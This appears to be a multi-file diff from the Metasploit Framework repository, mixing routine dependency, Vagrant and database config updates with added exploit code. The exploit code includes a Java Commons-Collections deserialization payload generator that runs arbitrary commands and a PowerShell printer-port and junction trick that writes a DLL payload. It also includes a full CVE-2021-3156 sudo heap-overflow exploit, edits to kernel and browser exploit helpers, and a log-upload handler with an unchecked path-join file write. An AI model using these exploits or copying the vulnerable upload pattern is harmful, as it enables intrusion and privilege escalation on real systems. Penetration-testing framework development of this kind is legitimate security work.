-pdf-reader, 2.4.0, MIT
+pdf-reader, 2.4.2, MIT
 pg, 1.2.3, "Simplified BSD"
 pry, 0.13.1, MIT
 pry-byebug, 3.9.0, MIT
-public_suffix, 4.0.5, MIT
+public_suffix, 4.0.6, MIT
+puma, 5.2.2, "New BSD"
+racc, 1.5.2, "ruby, Simplified BSD"
 rack, 2.2.3, MIT
-rack-protection, 2.0.8.1, MIT
+rack-protection, 2.1.0, MIT
 rack-test, 1.1.0, MIT
 rails-dom-testing, 2.0.3, MIT
 rails-html-sanitizer, 1.3.0, MIT
-railties, 5.2.4.3, MIT
+railties, 5.2.5, MIT
 rainbow, 3.0.0, MIT
-rake, 13.0.1, MIT
+rake, 13.0.3, MIT
 rb-readline, 0.5.5, BSD
-recog, 2.3.14, unknown
-redcarpet, 3.5.0, MIT
-regexp_parser, 1.7.1, MIT
-reline, 0.1.4, "Ruby License"
-rex-arch, 0.1.13, "New BSD"
-rex-bin_tools, 0.1.6, "New BSD"
-rex-core, 0.1.13, "New BSD"
-rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.24, "New BSD"
-rex-java, 0.1.5, "New BSD"
-rex-mime, 0.1.5, "New BSD"
-rex-nop, 0.1.1, "New BSD"
-rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.87, "New BSD"
-rex-random_identifier, 0.1.4, "New BSD"
-rex-registry, 0.1.3, "New BSD"
-rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.23, "New BSD"
-rex-sslscan, 0.1.5, "New BSD"
-rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.28, "New BSD"
-rex-zip, 0.1.3, "New BSD"
-rexml, 3.2.4, "Simplified BSD"
+recog, 2.3.19, unknown
+redcarpet, 3.5.1, MIT
+regexp_parser, 2.1.1, MIT
+reline, 0.2.5, ruby
+rex-arch, 0.1.14, "New BSD"
+rex-bin_tools, 0.1.7, "New BSD"
+rex-core, 0.1.16, "New BSD"
+rex-encoder, 0.1.5, "New BSD"
+rex-exploitation, 0.1.27, "New BSD"
+rex-java, 0.1.6, "New BSD"
+rex-mime, 0.1.6, "New BSD"
+rex-nop, 0.1.2, "New BSD"
+rex-ole, 0.1.7, "New BSD"
+rex-powershell, 0.1.89, "New BSD"
+rex-random_identifier, 0.1.5, "New BSD"
+rex-registry, 0.1.4, "New BSD"
+rex-rop_builder, 0.1.4, "New BSD"
+rex-socket, 0.1.29, "New BSD"
+rex-sslscan, 0.1.6, "New BSD"
+rex-struct2, 0.1.3, "New BSD"
+rex-text, 0.2.34, "New BSD"
+rex-zip, 0.1.4, "New BSD"
+rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
-rspec, 3.9.0, MIT
-rspec-core, 3.9.2, MIT
-rspec-expectations, 3.9.2, MIT
-rspec-mocks, 3.9.1, MIT
-rspec-rails, 4.0.1, MIT
+rspec, 3.10.0, MIT
+rspec-core, 3.10.1, MIT
+rspec-expectations, 3.10.1, MIT
+rspec-mocks, 3.10.2, MIT
+rspec-rails, 5.0.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.9.3, MIT
-rubocop, 0.89.1, MIT
-rubocop-ast, 0.3.0, MIT
-ruby-macho, 2.2.0, MIT
-ruby-prof, 1.4.1, "Simplified BSD"
-ruby-progressbar, 1.10.1, MIT
+rspec-support, 3.10.2, MIT
+rubocop, 1.12.1, MIT
+rubocop-ast, 1.4.1, MIT
+ruby-macho, 2.5.0, MIT
+ruby-prof, 1.4.2, "Simplified BSD"
+ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
-ruby2_keywords, 0.0.2, ruby
-ruby_smb, 2.0.2, "New BSD"
-rubyntlm, 0.6.2, MIT
+ruby2_keywords, 0.0.4, "ruby, Simplified BSD"
+ruby_smb, 2.0.8, "New BSD"
+rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.0, "Simplified BSD"
 sawyer, 0.8.2, MIT
 simplecov, 0.18.2, MIT
-simplecov-html, 0.12.2, MIT
-simpleidn, 0.1.1, MIT
-sinatra, 2.0.8.1, MIT
-sqlite3, 1.3.13, "New BSD"
+simplecov-html, 0.12.3, MIT
+simpleidn, 0.2.1, MIT
+sinatra, 2.1.0, MIT
+sqlite3, 1.4.2, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
-thin, 1.7.2, "GPLv2+, Ruby 1.8"
-thor, 1.0.1, MIT
+thin, 1.8.0, "GPL-2.0+, ruby"
+thor, 1.1.0, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.10, MIT
-timecop, 0.9.1, MIT
-ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.7, MIT
-tzinfo-data, 1.2020.1, MIT
+timecop, 0.9.4, MIT
+ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
+tzinfo, 1.2.9, MIT
+tzinfo-data, 1.2021.1, MIT
 unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.7.7, MIT
-unicode-display_width, 1.7.0, MIT
-warden, 1.2.8, MIT
+unicode-display_width, 2.0.0, MIT
+warden, 1.2.9, MIT
+webrick, 1.7.0, "ruby, Simplified BSD"
 websocket-driver, 0.7.3, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 windows_error, 0.1.2, BSD
-xdr, 3.0.1, "Apache 2.0"
-xmlrpc, 0.3.0, ruby
-yard, 0.9.25, MIT
+xdr, 3.0.2, "Apache 2.0"
+xmlrpc, 0.3.2, "ruby, Simplified BSD"
+yard, 0.9.26, MIT
+zeitwerk, 2.4.2, MIT
@@ -1,5 +1,6 @@
 #!/usr/bin/env rake
 require File.expand_path('../config/application', __FILE__)
+require 'msfenv'
 require 'metasploit/framework/require'
 require 'metasploit/framework/spec/untested_payloads'

@@ -1,17 +1,23 @@
 # -*- mode: ruby -*-
 # vi: set ft=ruby :

+display_name = "metasploit-framework"
+
 Vagrant.configure(2) do |config|
  config.ssh.forward_x11 = true
-  config.vm.box = "ubuntu/bionic64"
+  config.vm.box = "hashicorp/bionic64" # https://app.vagrantup.com/hashicorp/boxes/bionic64
  config.vm.network :forwarded_port, guest: 4444, host: 4444
-  config.vm.provider "vmware" do |v|
+  config.vm.provider "vmware_desktop" do |v|
 	  v.memory = 2048
 	  v.cpus = 2
+    v.vmx['displayname'] = display_name
+    #v.gui = true # uncomment to show VM in your hypervisor's GUI
  end
  config.vm.provider "virtualbox" do |v|
+    v.name = display_name
 	  v.memory = 2048
 	  v.cpus = 2
+    #v.gui = true # uncomment to show VM in your hypervisor's GUI
  end
  %w(.vimrc .gitconfig).each do |f|
    local = File.expand_path "~/#{f}"
@@ -28,11 +34,16 @@ Vagrant.configure(2) do |config|
    config.vm.provision "shell", inline: step
  end

-  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 7D2BAF1CF37B13E2069D6956105BD0E739499BDB",
-    "curl -L https://get.rvm.io | bash -s stable",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
-    "mkdir -p ~/.msf4",
+  [ # use the rvm install method used in omnibus install
+    # only show stderr when gpg really fails. avoids superfluous stderr from gpg
+    'out=`curl -sSL https://rvm.io/mpapis.asc | gpg --import - 2>&1` && echo "imported mpapis.asc" || echo $out 1>&2',
+    'out=`curl -sSL https://rvm.io/pkuczynski.asc | gpg --import - 2>&1` && echo "imported pkuczynski.asc" || echo $out 1>&2',
+    'out=`curl -L -sSL https://get.rvm.io | bash -s stable 2>&1` && echo "rvm installed" || echo $out 1>&2',
+    # only install Ruby if the right version isn't already present
+    "echo 'Installing Ruby if necessary'",
+    'cd /vagrant && rv=`cat .ruby-version` && source ~/.rvm/scripts/rvm && rvm list strings | grep -q $rv || rvm install $rv',
+    'source ~/.rvm/scripts/rvm && cd /vagrant && gem install --quiet bundler && bundle',
+    'mkdir -p ~/.msf4',
  ].each do |step|
    config.vm.provision "shell", privileged: false, inline: step
  end
@@ -29,7 +29,6 @@ require 'action_view/railtie'

 require 'metasploit/framework/common_engine'
 require 'metasploit/framework/database'
-
 module Metasploit
  module Framework
    class Application < Rails::Application
@@ -52,3 +51,4 @@ end

 # Silence warnings about this defaulting to true
 I18n.enforce_available_locales = true
+require 'msfenv'
@@ -1,4 +1,4 @@
-# @note This file is only for use in travis-ci.  If you need to make a
+# @note This file is only for use in GitHub Actions.  If you need to make a
 # config/database.yml for running rake, rake spec, or rspec locally, please
 # customize `conifg/database.yml.example`
 #
@@ -6,14 +6,12 @@
 #   cp config/database.yml.example config/database.yml
 #   # update password fields for each environment's user

-# Using the postgres user locally without a host and port is the supported
-# configuration from Travis-CI
-#
-# @see http://about.travis-ci.org/docs/user/database-setup/#PostgreSQL
 development: &pgsql
  adapter: postgresql
  database: metasploit_framework_development
+  host: localhost
  username: postgres
+  password: postgres
  pool: 25
  timeout: 5

@@ -1,5 +1,4 @@
 # Load the rails application
 require File.expand_path('../application', __FILE__)
-
 # Initialize the rails application
 Metasploit::Framework::Application.initialize!
@@ -0,0 +1,191 @@
+package org.vulhub;
+
+import java.io.FileOutputStream;
+import java.io.ObjectOutputStream;
+import java.io.ObjectStreamException;
+import java.io.Serializable;
+import java.lang.reflect.Field;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.PrivateKey;
+import java.security.PublicKey;
+import java.security.Signature;
+import java.security.SignedObject;
+import java.util.Comparator;
+import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Map;
+import java.util.concurrent.ConcurrentSkipListSet;
+import java.util.concurrent.CopyOnWriteArraySet;
+
+import net.sf.json.JSONArray;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.collection.AbstractCollectionDecorator;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+import org.apache.commons.collections.map.ReferenceMap;
+import org.apache.commons.collections.set.ListOrderedSet;
+
+public class Payload implements Serializable {
+
+    private Serializable payload;
+
+    private Payload(String cmd) throws Exception {
+
+        this.payload = this.setup(cmd);
+
+    }
+
+    private Serializable setup(String cmd) throws Exception {
+        final String[] execArgs = new String[] { cmd };
+
+        final Transformer[] transformers = new Transformer[] {
+                new ConstantTransformer(Runtime.class),
+                new InvokerTransformer("getMethod", new Class[] { String.class,
+                        Class[].class }, new Object[] { "getRuntime",
+                        new Class[0] }),
+                new InvokerTransformer("invoke", new Class[] { Object.class,
+                        Object[].class }, new Object[] { null, new Object[0] }),
+                new InvokerTransformer("exec", new Class[] { String.class },
+                        execArgs), new ConstantTransformer(1) };
+
+        Transformer transformerChain = new ChainedTransformer(transformers);
+
+        final Map innerMap = new HashMap();
+
+        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+
+        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
+
+        HashSet map = new HashSet(1);
+        map.add("foo");
+        Field f = null;
+        try {
+            f = HashSet.class.getDeclaredField("map");
+        } catch (NoSuchFieldException e) {
+            f = HashSet.class.getDeclaredField("backingMap");
+        }
+
+        f.setAccessible(true);
+        HashMap innimpl = (HashMap) f.get(map);
+
+        Field f2 = null;
+        try {
+            f2 = HashMap.class.getDeclaredField("table");
+        } catch (NoSuchFieldException e) {
+            f2 = HashMap.class.getDeclaredField("elementData");
+        }
+
+        f2.setAccessible(true);
+        Object[] array2 = (Object[]) f2.get(innimpl);
+
+        Object node = array2[0];
+        if (node == null) {
+            node = array2[1];
+        }
+
+        Field keyField = null;
+        try {
+            keyField = node.getClass().getDeclaredField("key");
+        } catch (Exception e) {
+            keyField = Class.forName("java.util.MapEntry").getDeclaredField(
+                    "key");
+        }
+
+        keyField.setAccessible(true);
+        keyField.set(node, entry);
+
+        KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
+        keyPairGenerator.initialize(1024);
+        KeyPair keyPair = keyPairGenerator.genKeyPair();
+        PrivateKey privateKey = keyPair.getPrivate();
+        PublicKey publicKey = keyPair.getPublic();
+
+        Signature signature = Signature.getInstance(privateKey.getAlgorithm());
+        SignedObject payload = new SignedObject(map, privateKey, signature);
+        JSONArray array = new JSONArray();
+
+        array.add("asdf");
+
+        ListOrderedSet set = new ListOrderedSet();
+        Field f1 = AbstractCollectionDecorator.class
+                .getDeclaredField("collection");
+        f1.setAccessible(true);
+        f1.set(set, array);
+
+        DummyComperator comp = new DummyComperator();
+        ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp);
+        csls.add(payload);
+
+        CopyOnWriteArraySet a1 = new CopyOnWriteArraySet();
+        CopyOnWriteArraySet a2 = new CopyOnWriteArraySet();
+
+        a1.add(set);
+        Container c = new Container(csls);
+        a1.add(c);
+
+        a2.add(csls);
+        a2.add(set);
+
+        ReferenceMap flat3map = new ReferenceMap();
+        flat3map.put(new Container(a1), "asdf");
+        flat3map.put(new Container(a2), "asdf");
+
+        return flat3map;
+    }
+
+    private Object writeReplace() throws ObjectStreamException {
+        return this.payload;
+    }
+
+    private static class Container implements Serializable {
+
+        private Object o;
+
+        private Container(Object o) {
+            this.o = o;
+        }
+
+        private Object writeReplace() throws ObjectStreamException {
+            return o;
+        }
+
+    }
+
+    static class DummyComperator implements Comparator, Serializable {
+
+        public int compare(Object arg0, Object arg1) {
+            // TODO Auto-generated method stub
+            return 0;
+        }
+
+        private Object writeReplace() throws ObjectStreamException {
+            return null;
+        }
+
+    }
+
+    public static void main(String args[]) throws Exception{
+
+        if(args.length != 2){
+            System.out.println("java -jar payload.jar outfile cmd");
+            System.exit(0);
+        }
+
+        String cmd = args[1];
+        FileOutputStream out = new FileOutputStream(args[0]);
+
+        Payload pwn = new Payload(cmd);
+        ObjectOutputStream oos = new ObjectOutputStream(out);
+        oos.writeObject(pwn);
+        oos.flush();
+        out.flush();
+
+
+    }
+
+}
@@ -0,0 +1,107 @@
+# Import-Module NtObjectManager -ErrorAction Ignore
+
+$Ref = (
+"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
+"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
+);
+
+$MethodDefinition = @"
+    using System;
+    using System.IO;
+    using System.Runtime.InteropServices;
+    namespace Printer {
+        public class RawPrinterHelper
+        {
+            // Structure and API declarions:
+            [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
+            public class DOCINFOA
+            {
+                [MarshalAs(UnmanagedType.LPStr)]
+                public string pDocName;
+                [MarshalAs(UnmanagedType.LPStr)]
+                public string pOutputFile;
+                [MarshalAs(UnmanagedType.LPStr)]
+                public string pDataType;
+            }
+            [DllImport("winspool.Drv", EntryPoint = "OpenPrinterA", SetLastError = true, CharSet = CharSet.Ansi, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
+            public static extern bool OpenPrinter([MarshalAs(UnmanagedType.LPStr)] string szPrinter, out IntPtr hPrinter, IntPtr pd);
+            [DllImport("winspool.Drv", EntryPoint = "ClosePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
+            public static extern bool ClosePrinter(IntPtr hPrinter);
+            [DllImport("winspool.Drv", EntryPoint = "StartDocPrinterA", SetLastError = true, CharSet = CharSet.Ansi, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
+            public static extern bool StartDocPrinter(IntPtr hPrinter, Int32 level, [In, MarshalAs(UnmanagedType.LPStruct)] DOCINFOA di);
+            [DllImport("winspool.Drv", EntryPoint = "EndDocPrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
+            public static extern bool EndDocPrinter(IntPtr hPrinter);
+            [DllImport("winspool.Drv", EntryPoint = "StartPagePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
+            public static extern bool StartPagePrinter(IntPtr hPrinter);
+            [DllImport("winspool.Drv", EntryPoint = "EndPagePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
+            public static extern bool EndPagePrinter(IntPtr hPrinter);
+            [DllImport("winspool.Drv", EntryPoint = "WritePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
+            public static extern bool WritePrinter(IntPtr hPrinter, IntPtr pBytes, Int32 dwCount, out Int32 dwWritten);
+            // SendBytesToPrinter()
+            // When the function is given a printer name and an unmanaged array
+            // of bytes, the function sends those bytes to the print queue.
+            // Returns true on success, false on failure.
+            public static bool SendBytesToPrinter(string szPrinterName, IntPtr pBytes, Int32 dwCount)
+            {
+                Int32 dwError = 0, dwWritten = 0;
+                IntPtr hPrinter = new IntPtr(0);
+                DOCINFOA di = new DOCINFOA();
+                bool bSuccess = false; // Assume failure unless you specifically succeed.
+                di.pDocName = "My C#.NET RAW Document";
+                di.pDataType = "RAW";
+                // Open the printer.
+                if (OpenPrinter(szPrinterName.Normalize(), out hPrinter, IntPtr.Zero))
+                {
+                    // Start a document.
+                    if (StartDocPrinter(hPrinter, 1, di))
+                    {
+                        // Start a page.
+                        if (StartPagePrinter(hPrinter))
+                        {
+                            // Write your bytes.
+                            bSuccess = WritePrinter(hPrinter, pBytes, dwCount, out dwWritten);
+                            EndPagePrinter(hPrinter);
+                        }
+                        EndDocPrinter(hPrinter);
+                    }
+                    ClosePrinter(hPrinter);
+                }
+                // If you did not succeed, GetLastError may give more information
+                // about why not.
+                if (bSuccess == false)
+                {
+                    dwError = Marshal.GetLastWin32Error();
+                }
+                return bSuccess;
+            }
+        }
+    }
+"@;
+
+Add-Type -ReferencedAssemblies $Ref -TypeDefinition $MethodDefinition -Language CSharp;
+
+Remove-Printer -Name PRINTER_NAME -ErrorAction SilentlyContinue | Out-Null
+
+Remove-PrinterPort -Name JUNCTION_FILEPATH -ErrorAction SilentlyContinue | Out-Null
+
+Add-PrinterDriver -Name "Generic / Text Only"
+
+mkdir "JUNCTION_PATH" | Out-Null
+
+Add-PrinterPort -Name JUNCTION_FILEPATH  | Out-Null
+
+Write-Host "[+] Added PrinterPort successfully on JUNCTION_FILEPATH"
+
+Remove-Item -Recurse -Force JUNCTION_PATH -ErrorAction SilentlyContinue | Out-Null
+
+New-Item -Type Junction -Path JUNCTION_PATH -Value DESTINATION_PATH | Out-Null
+
+Write-Host "[+] Mount point created successfully on DESTINATION_PATH"
+
+Add-Printer -Name "PRINTER_NAME" -DriverName "Generic / Text Only" -PortName "JUNCTION_FILEPATH" | Out-Null
+
+$PE =  [System.Convert]::FromBase64String('B64_PAYLOAD_DLL')
+[IntPtr] $unmanaged = ([system.runtime.interopservices.marshal]::AllocHGlobal($pe.Length));
+[system.runtime.interopservices.marshal]::Copy($PE, 0, $unmanaged, $PE.Length);
+[Printer.RawPrinterHelper]::SendBytesToPrinter("PRINTER_NAME", $unmanaged, $PE.Length);
+
@@ -0,0 +1,155 @@
+/**
+ ** CVE-2021-3156 PoC by blasty <peter@haxx.in>
+ ** ===========================================
+ **
+ ** Exploit for that sudo heap overflow thing everyone is talking about.
+ ** This one aims for singleshot. Does not fuck with your system files.
+ ** No warranties.
+ **
+ ** Shout outs to:
+ **   Qualys      - for pumping out the awesome bugs
+ **   lockedbyte  - for coop hax. (shared tmux gdb sessions ftw)
+ **   dsc         - for letting me rack up his electricity bill
+ **   my wife     - for all the quality time we had to skip
+ **
+ **  Enjoy!
+ **
+ **   -- blasty // 20210130
+ **/
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <ctype.h>
+#include <pty.h>
+#include <termios.h>
+#include <fcntl.h>
+#include <libgen.h>
+
+#include <sys/select.h>
+#include <sys/wait.h>
+
+// 512 environment variables should be enough for everyone
+#define MAX_ENVP 512
+#define SUDOEDIT_PATH "/usr/bin/sudoedit"
+
+typedef struct {
+    char *name;
+    char *sudoedit_path;
+    uint32_t smash_len_a;
+    uint32_t smash_len_b;
+    uint32_t null_stomp_len;
+    uint32_t lc_all_len;
+    char *overwrite_path;
+} target_t;
+
+/* main from: https://github.com/blasty/CVE-2021-3156/blob/main/hax.c */
+int exploit(int argc, char *argv[]) {
+    char *lib_path = "X/P0P_SH3LLZ_";
+    if (!((argc == 5) || (argc == 6))) {
+        return -1;
+    }
+    /* if an extra argument is specified, it is component of the library path to
+     * load that is overwritten and must be exactly 11 characters long
+     */
+    if (argc == 6) {
+        if (strlen(argv[5]) != 11) {
+            return -1;
+        }
+        lib_path = argv[5];
+    }
+
+    target_t *target = NULL;
+    target = malloc(sizeof(target_t));
+    target->name           = "Manual";
+    target->sudoedit_path  = SUDOEDIT_PATH;
+    target->smash_len_a    = atoi(argv[1]);
+    target->smash_len_b    = atoi(argv[2]);
+    target->null_stomp_len = atoi(argv[3]);
+    target->lc_all_len     = atoi(argv[4]);
+    target->overwrite_path = lib_path;
+
+    printf(
+        "using target: %s '%s' (%d, %d, %d, %d)\n",
+        target->name,
+        target->sudoedit_path,
+        target->smash_len_a,
+        target->smash_len_b,
+        target->null_stomp_len,
+        target->lc_all_len
+    );
+
+    char *smash_a = calloc(target->smash_len_a + 2, 1);
+    char *smash_b = calloc(target->smash_len_b + 2, 1);
+
+    memset(smash_a, '#', target->smash_len_a);
+    memset(smash_b, '#', target->smash_len_b);
+
+    smash_a[target->smash_len_a] = '\\';
+    smash_b[target->smash_len_b] = '\\';
+
+    char *s_argv[]={
+        "sudoedit", "-s", smash_a, "\\", smash_b, NULL
+    };
+
+    char *s_envp[MAX_ENVP];
+    int envp_pos = 0;
+
+    for(int i = 0; i < target->null_stomp_len; i++) {
+        s_envp[envp_pos++] = "\\";
+    }
+    s_envp[envp_pos++] = target->overwrite_path;
+
+    char *lc_all = calloc(target->lc_all_len + 16, 1);
+    strcpy(lc_all, "LC_ALL=C.UTF-8@");
+    memset(lc_all+15, 'C', target->lc_all_len);
+
+    s_envp[envp_pos++] = lc_all;
+    s_envp[envp_pos++] = NULL;
+
+    execve(target->sudoedit_path, s_argv, s_envp);
+    return 0;
+}
+
+int main(int argc, char *argv[]) {
+    int tty_fd;
+    pid_t pid = 0;
+
+    pid = forkpty(&tty_fd, NULL, NULL, NULL);
+
+    if (pid < 0) {
+        printf("forkpty(3) failed\n");
+        return -1;
+    } else if (pid == 0) {
+        /* need to set the working directory so the payload lib can be loaded from a relative path */
+        char *path = realpath(argv[0], NULL);
+        if (path) {
+            chdir(dirname(path));
+            free(path);
+        }
+
+        return exploit(argc, argv);
+    }
+
+    for (;;) {
+        char input;
+        char output;
+        fd_set read_fd;
+
+        FD_ZERO(&read_fd);
+        FD_SET(tty_fd, &read_fd);
+        FD_SET(STDIN_FILENO, &read_fd);
+
+        select(tty_fd + 1, &read_fd, NULL, NULL, NULL);
+
+        if (FD_ISSET(tty_fd, &read_fd)) {
+            if (read(tty_fd, &output, 1) != -1)
+                write(STDOUT_FILENO, &output, 1);
+            else
+                break;
+        }
+    }
+    return 0;
+}
@@ -456,7 +456,7 @@ static unsigned long find_cred() {
 				continue;
 			}
 			
-			unsigned long test_uid = (read64(cred_struct + 8) & 0xFFFFFFFF);
+			unsigned long test_uid = (read64(cred_struct + sizeof(int)) & 0xFFFFFFFF);
 			
 			if(test_uid != uid) {
 				continue;
@@ -79,17 +79,41 @@ function Int64(v) {
        return '0x' + hexlify(Array.from(bytes).reverse());
    };

-    this.lo = function()
-    {
+    this.lo = function() {
        var b = this.bytes();
        return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
    };

-    this.hi = function()
-    {
+    this.hi = function() {
        var b = this.bytes();
        return (b[4] | (b[5] << 8) | (b[6] << 16) | (b[7] << 24)) >>> 0;
    };
+    
+    this.asInt32 = function() {
+        var value = new Int64(0);
+        for (var i = 0; i < 8; i++) {
+            if (i < 4) {
+                value.bytes[i] = this.bytes[i];
+            } else {
+                value.bytes[i] = 0;
+            }
+        }
+        
+        return parseInt('0x' + hexlify(Array.from(value.bytes).reverse()).slice(-8));
+    };
+    
+    this.asInt16 = function() {
+        var value = new Int64(0);
+        for (var i = 0; i < 8; i++) {
+            if (i < 2) {
+                value.bytes[i] = this.bytes[i];
+            } else {
+                value.bytes[i] = 0;
+            }
+        }
+        
+        return parseInt('0x' + hexlify(Array.from(value.bytes).reverse()).slice(-8));
+    };

    // Basic arithmetic.
    // These functions assign the result of the computation to their 'this' object.
@@ -138,20 +162,44 @@ function Int64(v) {
    }, 2);

    // this = a ^ b
-    this.assignXor = operation(function sub(a, b) {
+    this.assignXor = operation(function xor(a, b) {
        for (var i = 0; i < 8; i++) {
            bytes[i] = a.byteAt(i) ^ b.byteAt(i);
        }
        return this;
    }, 2);
-
+    
    // this = a & b
-    this.assignAnd = operation(function sub(a, b) {
+    this.assignAnd = operation(function and(a, b) {
        for (var i = 0; i < 8; i++) {
            bytes[i] = a.byteAt(i) & b.byteAt(i);
        }
        return this;
-    }, 2)
+    }, 2);
+    
+    // this = a << b
+    this.assignShiftLeft = operation(function shiftLeft(a, b) {
+        for (var i = 0; i < 8; i++) {
+            if (i < b) {
+                bytes[i] = 0;
+            } else {
+                bytes[i] = a.byteAt(Sub(i, b).asInt32());
+            }
+        }
+        return this;
+    }, 2);
+    
+    // this = a >> b
+    this.assignShiftRight = operation(function shiftRight(a, b) {
+        for (var i = 0; i < 8; i++) {
+            if (i < (8 - b)) {
+                bytes[i] = a.byteAt(Add(i, b).asInt32());
+            } else {
+                bytes[i] = 0;
+            }
+        }
+        return this;
+    }, 2);
 }

 // Constructs a new Int64 instance with the same bit representation as the provided double.
@@ -187,6 +235,16 @@ function And(a, b) {
    return (new Int64()).assignAnd(a, b);
 }

+// Return a << b
+function ShiftLeft(a, b) {
+    return (new Int64()).assignShiftLeft(a, b);
+}
+
+// Return a >> b
+function ShiftRight(a, b) {
+    return (new Int64()).assignShiftRight(a, b);
+}
+
 // Some commonly used numbers.
 Int64.Zero = new Int64(0);
 Int64.One = new Int64(1);
@@ -64,8 +64,6 @@ function b2u32(b)
    return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
 }

-
-
 function off2addr(segs, off)
 {
    if(!(off instanceof Int64)) off = new Int64(off);
@@ -138,47 +136,11 @@ function fsyms(mem, base, segs, want, syms)
    return syms;
 }

-function strcmp(b, str)
-{
-    var fn = typeof b == "function" ? b : function(i) { return b[i]; };
-    for(var i = 0; i < str.length; ++i)
-    {
-        if(fn(i) != str.charCodeAt(i))
-        {
-            return false;
-        }
-    }
-    return fn(str.length) == 0;
-}
-
 function _u32(i)
 {
    return b2u32(this.read(i, 4));
 }

-function _read(i, l)
-{
-    if (i instanceof Int64) i = i.lo();
-    if (l instanceof Int64) l = l.lo();
-    if (i + l > this.length)
-    {
-        fail(`OOB read: ${i} -> ${i + l}, size: ${l}`);
-    }
-    return this.slice(i, i + l);
-}
-
-function _readInt64(addr)
-{
-    return new Int64(this.read(addr, 8));
-}
-
-function _writeInt64(i, val)
-{
-    if (i instanceof Int64) i = i.lo();
-    this.set(val.bytes(), i);
-}
-
-
 // Simplified version of the similarly named python module.
 var Struct = (function() {
    // Allocate these once to avoid unecessary heap allocations during pack/unpack operations.
@@ -0,0 +1,107 @@
+#! /usr/bin/env python3
+import cgi
+import os,sys
+import logging
+import json
+
+WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME = "workload_log_{}.zip"
+
+class LogFileJson:
+    """ Defines format to upload log file in harness
+
+    Arguments:
+    itrLogPath : log path provided by harness to store log data
+    logFileType : Type of log file defined in api.agentlogFileType
+    workloadID [OPTIONAL] : workload id, if log file is workload specific
+
+    """
+    def __init__(self, itrLogPath, logFileType, workloadID = None):
+        self.itrLogPath = itrLogPath
+        self.logFileType = logFileType
+        self.workloadID = workloadID
+
+    def to_json(self):
+        return json.dumps(self.__dict__)
+
+    @classmethod
+    def from_json(cls, json_str):
+        json_dict = json.loads(json_str)
+        return cls(**json_dict)
+
+class agentlogFileType():
+    """ Defines various log file types to be uploaded by agent
+
+    """
+    WORKLOAD_ZIP_LOG = "workloadLogsZipFile"
+
+try:
+    # TO DO: Puth path in some config
+    logging.basicConfig(filename="/etc/httpd/html/logs/uploader.log",filemode='a', level=logging.ERROR)
+except:
+    # In case write permission is not available in log folder.
+    pass
+
+logger = logging.getLogger('log_upload_wsgi.py')
+
+def application(environ, start_response):
+    logger.debug("application called")
+
+    if environ['REQUEST_METHOD'] == 'POST':
+        post = cgi.FieldStorage(
+            fp=environ['wsgi.input'],
+            environ=environ,
+            keep_blank_values=True
+        )
+        # TO DO: Puth path in some config or read from config is already available
+        resultBasePath = "/etc/httpd/html/vpresults"
+        try:
+            filedata = post["logfile"]
+            metaData = post["logMetaData"]
+
+            if metaData.value:
+                logFileJson = LogFileJson.from_json(metaData.value)
+
+            if not os.path.exists(os.path.join(resultBasePath, logFileJson.itrLogPath)):
+                os.makedirs(os.path.join(resultBasePath, logFileJson.itrLogPath))
+
+            if filedata.file:
+                if (logFileJson.logFileType == agentlogFileType.WORKLOAD_ZIP_LOG):
+                    filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME.format(str(logFileJson.workloadID)))
+                else:
+                    filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, logFileJson.logFileType)
+                with open(filePath, 'wb') as output_file:
+                    while True:
+                        data = filedata.file.read(1024)
+                        # End of file
+                        if not data:
+                            break
+                        output_file.write(data)
+
